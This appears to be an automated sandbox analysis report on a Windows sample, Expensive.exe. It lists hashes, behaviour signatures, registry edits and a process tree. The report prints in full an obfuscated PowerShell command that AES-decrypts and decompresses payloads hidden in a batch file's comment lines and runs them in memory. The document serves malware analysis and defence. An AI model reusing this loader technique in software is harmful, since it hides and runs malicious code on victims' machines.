Analysis
max time kernel: 10s
max time network: 0s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 26-05-2024 16:13
Static task: static1
Behavioral task: behavioral1
  Sample: Expensive.exe
  Resource: win7-20240508-en
Behavioral task: behavioral2
  Sample: Expensive.exe
  Resource: win10v2004-20240508-en
General
Target: Expensive.exe
Size: 599KB
MD5: 65e4c0420f496abb02201df254eb87a1
SHA1: 6efcf4be11132a32a3df5029c87d2daa466fcc1a
SHA256: 3684b6d86d9928b8dfef807c55d5de421b6325c0cb28991037d26703598d1e44
SHA512: bedb40ae7f3a6c1a2cc7e62069025d87b5383526e414df9825ad50bf8516077574134fe25ff285f0754d2bee608ba619ee56a33d4e9ddb6a997dab4d5635f6bb
SSDEEP: 12288:jeHrZIhqCgsKF/kFnBf5rkb2LAW/4Mon2rcATuNpGRhb5vUMfyU1/:jsFQqS0kR9aCkW/4t2r9upGmM6U1
Malware Config
Signatures
- Executes dropped EXE (1 IoCs)
  pid | Process
  2072 | ExpensiveLauncher.exe
- Loads dropped DLL (2 IoCs)
  pid | Process
  2936 | Expensive.exe
  2084 | Process not Found
- Command and Scripting Interpreter: PowerShell
  pid | Process
  2660 | powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (9 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ExpensiveLauncher.exe" | ExpensiveLauncher.exe
  Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\shell\open\command | ExpensiveLauncher.exe
  Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\shell\open | ExpensiveLauncher.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ExpensiveLauncher.exe" | ExpensiveLauncher.exe
  Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347 | ExpensiveLauncher.exe
  Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\DefaultIcon | ExpensiveLauncher.exe
  Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\shell | ExpensiveLauncher.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\ = "URL:Run game 1199748644409184347 protocol" | ExpensiveLauncher.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\discord-1199748644409184347\URL Protocol | ExpensiveLauncher.exe
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid | Process
  2660 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2660 | powershell.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  description | pid | Process | procid_target
  PID 2936 wrote to memory of 2072 | 2936 | Expensive.exe | 29
  PID 2936 wrote to memory of 2072 | 2936 | Expensive.exe | 29
  PID 2936 wrote to memory of 2072 | 2936 | Expensive.exe | 29
  PID 2936 wrote to memory of 3024 | 2936 | Expensive.exe | 31
  PID 2936 wrote to memory of 3024 | 2936 | Expensive.exe | 31
  PID 2936 wrote to memory of 3024 | 2936 | Expensive.exe | 31
  PID 3024 wrote to memory of 2720 | 3024 | cmd.exe | 33
  PID 3024 wrote to memory of 2720 | 3024 | cmd.exe | 33
  PID 3024 wrote to memory of 2720 | 3024 | cmd.exe | 33
  PID 2072 wrote to memory of 2740 | 2072 | ExpensiveLauncher.exe | 34
  PID 2072 wrote to memory of 2740 | 2072 | ExpensiveLauncher.exe | 34
  PID 2072 wrote to memory of 2740 | 2072 | ExpensiveLauncher.exe | 34
  PID 2720 wrote to memory of 2772 | 2720 | net.exe | 35
  PID 2720 wrote to memory of 2772 | 2720 | net.exe | 35
  PID 2720 wrote to memory of 2772 | 2720 | net.exe | 35
  PID 3024 wrote to memory of 2660 | 3024 | cmd.exe | 36
  PID 3024 wrote to memory of 2660 | 3024 | cmd.exe | 36
  PID 3024 wrote to memory of 2660 | 3024 | cmd.exe | 36
Processes
- C:\Users\Admin\AppData\Local\Temp\Expensive.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Expensive.exe"
  PID: 2936
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe"
    PID: 2072
    Signatures: Executes dropped EXE; Modifies registry class; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c cls
      PID: 2740
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\Expensive.bat" "
    PID: 3024
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net.exe
      Command line: net file
      PID: 2720
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 file
        PID: 2772
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zlo9ncEYo3QUkLbnvPRah2udZSQFyEkFClqBW6M5QLg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KvNrQpenzWsPMRFAkt8PNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dWnBZ=New-Object System.IO.MemoryStream(,$param_var); $fgVcf=New-Object System.IO.MemoryStream; $AcYrR=New-Object System.IO.Compression.GZipStream($dWnBZ, [IO.Compression.CompressionMode]::Decompress); $AcYrR.CopyTo($fgVcf); $AcYrR.Dispose(); $dWnBZ.Dispose(); $fgVcf.Dispose(); $fgVcf.ToArray();}function execute_function($param_var,$param2_var){ $MnaPb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KIsjD=$MnaPb.EntryPoint; $KIsjD.Invoke($null, $param2_var);}$UgcxC = 'C:\Users\Admin\AppData\Local\Temp\Expensive.bat';$host.UI.RawUI.WindowTitle = $UgcxC;$RYiHp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UgcxC).Split([Environment]::NewLine);foreach ($AWVRD in $RYiHp) { if ($AWVRD.StartsWith(':: ')) { $qeYnm=$AWVRD.Substring(3); break; }}$payloads_var=[string[]]$qeYnm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      PID: 2660
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 733KB
  MD5: ab7ca8b87249457d23cd632d21183dfc
  SHA1: d234f7e75f972baa135ab8505e44fcd478c04447
  SHA256: e1437b2de1ccd08aab8f31532cf8109afdb84782c8927f3feeea25ba6be10c6e
  SHA512: cd70a7400bc54bbcdb9c6c113e4785a7d3025a740415de997168d184950e874bc4b0c73448facdc89c8afbbdeef6b26deff703f19494bb56bf504d922f17dfa2
- Filesize: 101KB
  MD5: 0593b521f3e8af295d523ea480388b0f
  SHA1: 39fc9ab8b8663801319557b06defb2a50e0c5d08
  SHA256: 3247a643a33c091fe826b3ce8e5e9524c5863e3c71eb9168f1bf52520742a8b9
  SHA512: adc9c7875965c06fda648dce41975e1a7b7ef44b233a20efdebeae61e8b99c8e2cf809112cf3e4c1aaf00a2d1dd5c39a0be68541782aea9cbe87f12044c81b6d